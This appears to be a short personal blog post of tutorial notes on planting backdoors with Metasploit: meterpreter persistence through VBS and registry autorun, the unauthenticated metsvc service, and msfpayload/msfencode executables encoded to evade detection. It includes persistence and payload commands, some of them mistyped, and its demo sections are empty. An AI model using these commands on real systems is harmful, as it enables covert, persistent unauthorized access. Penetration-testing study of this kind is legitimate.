Metasploit Backdoor Tutorial

Create persistence backdoor
Can be configured to connect back on systemboot or user login
Time can be set between connect back attemps
Under the hood
    Create vbs file on the victim and excute it
    Add registry entries so it is autorun
Can be uninstalled remotely
    Vbs file delete manually
meterpreter > run persistence
meterpreter > run persistence -A -U -i 10 -p 3000 -r

Metsvc backdoor
Run as service on the victim
Connect to it remotely
    No authentication required
Can be remotely unintalled
    File need delete manually
Less noisy compared to persistence
    Attacker can connect when he wants
Can be found by portscaning
Demo: Backdoor with Metsvc

Create Executable from payloads
Use: msfpayload [var=val] [S]umamry|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecuate|[D]ll|[V]BA|[W]ar;
msfpayload windows/meterprete/bind_tcp RHOST= X | bind_tcp.exe
Encoding to obfucate payload
Encode payload to eavde detection
Encode payload to ensure that payload will work
    Removing NULL
Msfencode can be used in conjunction with msfpayloadDemo:
Create backdoor executalbe:

Encode backdoor:

Backdoor with metsvc:
Create backdoor with msfpayload:
Encode backdoor:

Thanks for reading
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more. 


Popular posts from this blog

Python - Multithread to read one file

An toàn thông tin ứng dụng Web

OpenCA tutorial